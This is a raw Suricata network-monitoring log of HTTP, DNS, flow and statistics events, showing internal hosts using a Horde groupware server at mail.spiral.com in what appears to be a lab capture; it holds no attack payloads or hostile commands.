{"timestamp":"2020-02-29T00:14:33.779815+0000","flow_id":1080320319612926,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34828,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?tasklist=KCDsO_NmBjYX5zVsrCfQDx7&task=CzzvouuXL90PtKLh7taEoDK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8792},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":35365,"tx_id":0}} {"timestamp":"2020-02-29T00:14:34.700227+0000","flow_id":959704753418051,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39423,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":50181,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:14:34.701748+0000","flow_id":658082085123380,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33640,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":36121,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:34.808864+0000","flow_id":959704753418051,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39423,"proto":"UDP","dns":{"type":"answer","id":50181,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:34.808864+0000","flow_id":959704753418051,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39423,"proto":"UDP","dns":{"type":"answer","id":50181,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:34.809817+0000","flow_id":658082085123380,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33640,"proto":"UDP","dns":{"type":"answer","id":36121,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:34.809817+0000","flow_id":658082085123380,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33640,"proto":"UDP","dns":{"type":"answer","id":36121,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:34.872848+0000","flow_id":54888288126643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52756,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5752}} {"timestamp":"2020-02-29T00:14:34.914303+0000","flow_id":512302305152088,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34830,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task\/save.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=KCDsO_NmBjYX5zVsrCfQDx7&task=CzzvouuXL90PtKLh7taEoDK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/nag\/list.php","length":20}} {"timestamp":"2020-02-29T00:14:34.924308+0000","flow_id":209077614025364,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45522,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":44440,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:35.033032+0000","flow_id":209077614025364,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45522,"proto":"UDP","dns":{"type":"answer","id":44440,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:35.033032+0000","flow_id":209077614025364,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45522,"proto":"UDP","dns":{"type":"answer","id":44440,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:14:36.000132+0000","event_type":"stats","stats":{"uptime":14528,"capture":{"kernel_packets":135658,"kernel_drops":0},"decoder":{"pkts":135661,"bytes":93416146,"invalid":187,"ipv4":134156,"ipv6":8,"ethernet":135661,"raw":0,"null":0,"sll":0,"tcp":128830,"udp":5124,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2778,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2794,"synack":2785,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1817,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2341,"failed_udp":112},"tx":{"http":4673,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2421}},"flow_mgr":{"closed_pruned":2762,"new_pruned":15,"est_pruned":2387,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23140,"memcap_state":0,"memcap_global":0},"http":{"memuse":53758,"memcap":0}}} 
{"timestamp":"2020-02-29T00:14:37.000629+0000","flow_id":1477849603888713,"event_type":"flow","src_ip":"192.168.10.130","src_port":34820,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":10,"bytes_toserver":1912,"bytes_toclient":6507,"start":"2020-02-29T00:13:31.382537+0000","end":"2020-02-29T00:13:36.778747+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:39.874014+0000","flow_id":54888288126643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52756,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5752},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":22300,"tx_id":0}} {"timestamp":"2020-02-29T00:14:39.946436+0000","flow_id":479196697555204,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45154,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":12066,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:40.054421+0000","flow_id":479196697555204,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45154,"proto":"UDP","dns":{"type":"answer","id":12066,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:14:40.054421+0000","flow_id":479196697555204,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45154,"proto":"UDP","dns":{"type":"answer","id":12066,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:40.178979+0000","flow_id":1209336842897935,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34832,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6755}} {"timestamp":"2020-02-29T00:14:42.000716+0000","flow_id":653855817992358,"event_type":"flow","src_ip":"192.168.10.122","src_port":49092,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:09:40.919718+0000","end":"2020-02-29T00:09:41.028314+0000","age":1,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:14:43.000194+0000","event_type":"stats","stats":{"uptime":14535,"capture":{"kernel_packets":135716,"kernel_drops":0},"decoder":{"pkts":135727,"bytes":93446988,"invalid":188,"ipv4":134222,"ipv6":8,"ethernet":135727,"raw":0,"null":0,"sll":0,"tcp":128887,"udp":5132,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2781,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2797,"synack":2788,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1820,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2345,"failed_udp":112},"tx":{"http":4676,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2425}},"flow_mgr":{"closed_pruned":2763,"new_pruned":15,"est_pruned":2387,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":23140,"memcap_state":0,"memcap_global":0},"http":{"memuse":53816,"memcap":0}}} 
{"timestamp":"2020-02-29T00:14:44.210095+0000","flow_id":1926025151001775,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47129,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17709,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:44.318670+0000","flow_id":1926025151001775,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47129,"proto":"UDP","dns":{"type":"answer","id":17709,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:44.318670+0000","flow_id":1926025151001775,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47129,"proto":"UDP","dns":{"type":"answer","id":17709,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:44.338503+0000","flow_id":30355435553035,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} 
{"timestamp":"2020-02-29T00:14:44.338503+0000","flow_id":30355435553035,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":18,"tx_id":0}} {"timestamp":"2020-02-29T00:14:45.000745+0000","flow_id":1943479878474362,"event_type":"flow","src_ip":"192.168.10.122","src_port":41241,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:09:44.645754+0000","end":"2020-02-29T00:09:44.754265+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:45.179858+0000","flow_id":1209336842897935,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34832,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6755},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":33151,"tx_id":0}} 
{"timestamp":"2020-02-29T00:14:46.043430+0000","flow_id":345417056692646,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41179,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":41844,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:46.152344+0000","flow_id":345417056692646,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41179,"proto":"UDP","dns":{"type":"answer","id":41844,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:46.152344+0000","flow_id":345417056692646,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41179,"proto":"UDP","dns":{"type":"answer","id":41844,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:46.216976+0000","flow_id":1918758066486106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34834,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3979}} 
{"timestamp":"2020-02-29T00:14:47.000556+0000","flow_id":489251210174079,"event_type":"flow","src_ip":"192.168.10.130","src_port":34814,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":11,"bytes_toserver":1295,"bytes_toclient":8193,"start":"2020-02-29T00:13:10.761471+0000","end":"2020-02-29T00:13:46.260707+0000","age":36,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:49.035557+0000","flow_id":30355435553035,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52758,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:14:49.044164+0000","flow_id":7712368340100,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44069,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":15118,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:49.152103+0000","flow_id":7712368340100,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44069,"proto":"UDP","dns":{"type":"answer","id":15118,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:14:49.152103+0000","flow_id":7712368340100,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44069,"proto":"UDP","dns":{"type":"answer","id":15118,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:49.301564+0000","flow_id":30355435553035,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:14:49.301564+0000","flow_id":30355435553035,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":198,"tx_id":1}} {"timestamp":"2020-02-29T00:14:49.316701+0000","flow_id":2108866204128541,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51339,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":25357,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:14:49.421564+0000","flow_id":2108866204128541,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51339,"proto":"UDP","dns":{"type":"answer","id":25357,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:49.421564+0000","flow_id":2108866204128541,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51339,"proto":"UDP","dns":{"type":"answer","id":25357,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:49.540560+0000","flow_id":30355435553035,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5677}} 
{"timestamp":"2020-02-29T00:14:50.000198+0000","event_type":"stats","stats":{"uptime":14542,"capture":{"kernel_packets":135743,"kernel_drops":0},"decoder":{"pkts":135756,"bytes":93455039,"invalid":188,"ipv4":134249,"ipv6":8,"ethernet":135756,"raw":0,"null":0,"sll":0,"tcp":128910,"udp":5136,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2783,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2799,"synack":2790,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1822,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2347,"failed_udp":112},"tx":{"http":4678,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2427}},"flow_mgr":{"closed_pruned":2764,"new_pruned":15,"est_pruned":2389,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":24131,"memcap_state":0,"memcap_global":0},"http":{"memuse":105616,"memcap":0}}} 
{"timestamp":"2020-02-29T00:14:50.001602+0000","flow_id":1254571419460852,"event_type":"flow","src_ip":"192.168.10.122","src_port":45436,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:09:49.091380+0000","end":"2020-02-29T00:09:49.199155+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:51.217864+0000","flow_id":1918758066486106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34834,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3979},"app_proto":"http","fileinfo":{"filename":"\/turba\/","state":"CLOSED","stored":false,"size":19145,"tx_id":0}} {"timestamp":"2020-02-29T00:14:52.000425+0000","flow_id":36578839428506,"event_type":"flow","src_ip":"192.168.10.130","src_port":34822,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":11,"bytes_toserver":1297,"bytes_toclient":8197,"start":"2020-02-29T00:13:46.261530+0000","end":"2020-02-29T00:13:51.621886+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:52.729829+0000","flow_id":1936470511985381,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49156,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":872,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:14:52.835054+0000","flow_id":1936470511985381,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49156,"proto":"UDP","dns":{"type":"answer","id":872,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:52.835054+0000","flow_id":1936470511985381,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49156,"proto":"UDP","dns":{"type":"answer","id":872,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:52.981007+0000","flow_id":1847126602345263,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34836,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/browse.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5092}} {"timestamp":"2020-02-29T00:14:53.002720+0000","flow_id":280640340632148,"event_type":"flow","src_ip":"192.168.10.122","src_port":52733,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:09:52.533076+0000","end":"2020-02-29T00:09:52.641396+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 